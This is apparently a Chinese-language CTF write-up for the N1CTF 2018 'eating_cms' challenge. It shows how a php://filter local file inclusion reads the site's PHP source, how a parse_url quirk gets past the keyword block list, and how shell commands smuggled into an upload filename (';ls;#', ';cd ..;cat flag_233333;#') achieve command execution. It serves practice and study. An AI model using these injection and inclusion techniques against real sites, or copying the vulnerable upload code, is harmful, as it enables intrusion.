2018]eating_cms - 刷题笔记

# [N1CTF 2018]eating_cms

一个登陆页面，试了试 admin 和 123456，无果，没找到注册页面

尝试 register.php 页面，存在注册页面，先注册个号登录看看

利用伪协议得到源码

http://a85cdc51-62e8-4ac7-a3b6-fe8e8924fdf8.node3.buuoj.cn/user.php?page=php://filter/convert.base64-encode/resource=user

源码 base64 解码后如下

	<?php
	require_once("function.php");
	if( !isset( $_SESSION['user'] )){
	Header("Location: index.php");

	}
	if($_SESSION['isadmin'] === '1'){
	$oper_you_can_do = $OPERATE_admin;
	}else{
	$oper_you_can_do = $OPERATE;
	}
	//die($_SESSION['isadmin']);
	if($_SESSION['isadmin'] === '1'){
	if(!isset($_GET['page']) \|\| $_GET['page'] === ''){
	$page = 'info';
	}else {
	$page = $_GET['page'];
	}
	}
	else{
	if(!isset($_GET['page'])\|\| $_GET['page'] === ''){
	$page = 'guest';
	}else {
	$page = $_GET['page'];
	if($page === 'info')
	{
	// echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
	Header("Location: user.php?page=guest");
	}
	}
	}
	filter_directory();
	//if(!in_array($page,$oper_you_can_do)){
	// $page = 'info';
	//}
	include "$page.php";
	?>

发现包含了一个 funciton.php，

	<?php
	session_start();
	require_once "config.php";
	function Hacker()
	{
	Header("Location: hacker.php");
	die();
	}


	function filter_directory()
	{
	$keywords = ["flag","manage","ffffllllaaaaggg"];
	$uri = parse_url($_SERVER["REQUEST_URI"]);
	parse_str($uri['query'], $query);
	// var_dump($query);
	// die();
	foreach($keywords as $token)
	{
	foreach($query as $k => $v)
	{
	if (stristr($k, $token))
	hacker();
	if (stristr($v, $token))
	hacker();
	}
	}
	}

	function filter_directory_guest()
	{
	$keywords = ["flag","manage","ffffllllaaaaggg","info"];
	$uri = parse_url($_SERVER["REQUEST_URI"]);
	parse_str($uri['query'], $query);
	// var_dump($query);
	// die();
	foreach($keywords as $token)
	{
	foreach($query as $k => $v)
	{
	if (stristr($k, $token))
	hacker();
	if (stristr($v, $token))
	hacker();
	}
	}
	}

	function Filter($string)
	{
	global $mysqli;
	$blacklist = "information\|benchmark\|order\|limit\|join\|file\|into\|execute\|column\|extractvalue\|floor\|update\|insert\|delete\|username\|password";
	$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
	for ($i = 0; $i < strlen($string); $i++) {
	if (strpos("$whitelist", $string[$i]) === false) {
	Hacker();
	}
	}
	if (preg_match("/$blacklist/is", $string)) {
	Hacker();
	}
	if (is_string($string)) {
	return $mysqli->real_escape_string($string);
	} else {
	return "";
	}
	}

	function sql_query($sql_query)
	{
	global $mysqli;
	$res = $mysqli->query($sql_query);
	return $res;
	}

	function login($user, $pass)
	{
	$user = Filter($user);
	$pass = md5($pass);
	$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
	echo $sql;
	$res = sql_query($sql);
	// var_dump($res);
	// die();
	if ($res->num_rows) {
	$data = $res->fetch_array();
	$_SESSION['user'] = $data[username_which_you_do_not_know];
	$_SESSION['login'] = 1;
	$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
	return true;
	} else {
	return false;
	}
	return;
	}

	function updateadmin($level,$user)
	{
	$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
	echo $sql;
	$res = sql_query($sql);
	// var_dump($res);
	// die();
	// die($res);
	if ($res == 1) {
	return true;
	} else {
	return false;
	}
	return;
	}

	function register($user, $pass)
	{
	global $mysqli;
	$user = Filter($user);
	$pass = md5($pass);
	$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
	$res = sql_query($sql);
	return $mysqli->insert_id;
	}

	function logout()
	{
	session_destroy();
	Header("Location: index.php");
	}

	?>

查看 ffffllllaaaaggg，发现被拦截了

	$keywords = ["flag","manage","ffffllllaaaaggg"];
	$uri = parse_url($_SERVER["REQUEST_URI"]);
	parse_str($uri['query'], $query);
	//这一段代码中有parse_url解析漏洞
	当出现//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
	会解析错误，返回false，就能读取到这个文件

ffffllllaaaaggg 页面

	<?php
	if (FLAG_SIG != 1){
	die("you can not visit it directly");
	}else {
	echo "you can find sth in m4aaannngggeee";
	}
	?>

m4aaannngggeee 页面

	<?php
	if (FLAG_SIG != 1){
	die("you can not visit it directly");
	}
	include "templates/upload.html";

	?>

来到 templates/upload.html 页面

有一个上传文件的按钮，上传一个马之后发现 upllloadddd.php 页面，但是个假的

读一下 upllloadddd 的源码

http://a85cdc51-62e8-4ac7-a3b6-fe8e8924fdf8.node3.buuoj.cn/user.php?page=php://filter/convert.base64-encode/resource=upllloadddd

	<?php
	$allowtype = array("gif","png","jpg");
	$size = 10000000;
	$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
	$filename = $_FILES['file']['name'];
	if(is_uploaded_file($_FILES['file']['tmp_name'])){
	if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
	die("error:can not move");
	}
	}else{
	die("error:not an upload file！");
	}
	$newfile = $path.$filename;
	echo "file upload success<br />";
	echo $filename;
	$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." \| base64 -w 0");
	echo "<img src='data:image/png;base64,".$picdata."'></img>";
	if($_FILES['file']['error']>0){
	unlink($newfile);
	die("Upload file error: ");
	}
	$ext = array_pop(explode(".",$_FILES['file']['name']));
	if(!in_array($ext,$allowtype)){
	unlink($newfile);
	}
	?>

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

没什么可以防文件名处命令执行的，所以考虑在 filename 处注入

查看到 m4aaannngggeee 页面，发现真正能上传的点，做到这一步线索断了好久。。不得不说出题人你真是… 真是聪明啊！！！

http://a85cdc51-62e8-4ac7-a3b6-fe8e8924fdf8.node3.buuoj.cn/user.php?page=m4aaannngggeee

抓包，修改 filename=";ls;#"

filename=";ls …;#", 看到 flag_233333

…/ 测试了不行，想知道为啥不能加 /

filename=";cd …;cat flag_233333;#"

# [N1CTF 2018]eating_cms

[GYCTF2020]Easyphp

[GYCTF2020]Ez_Express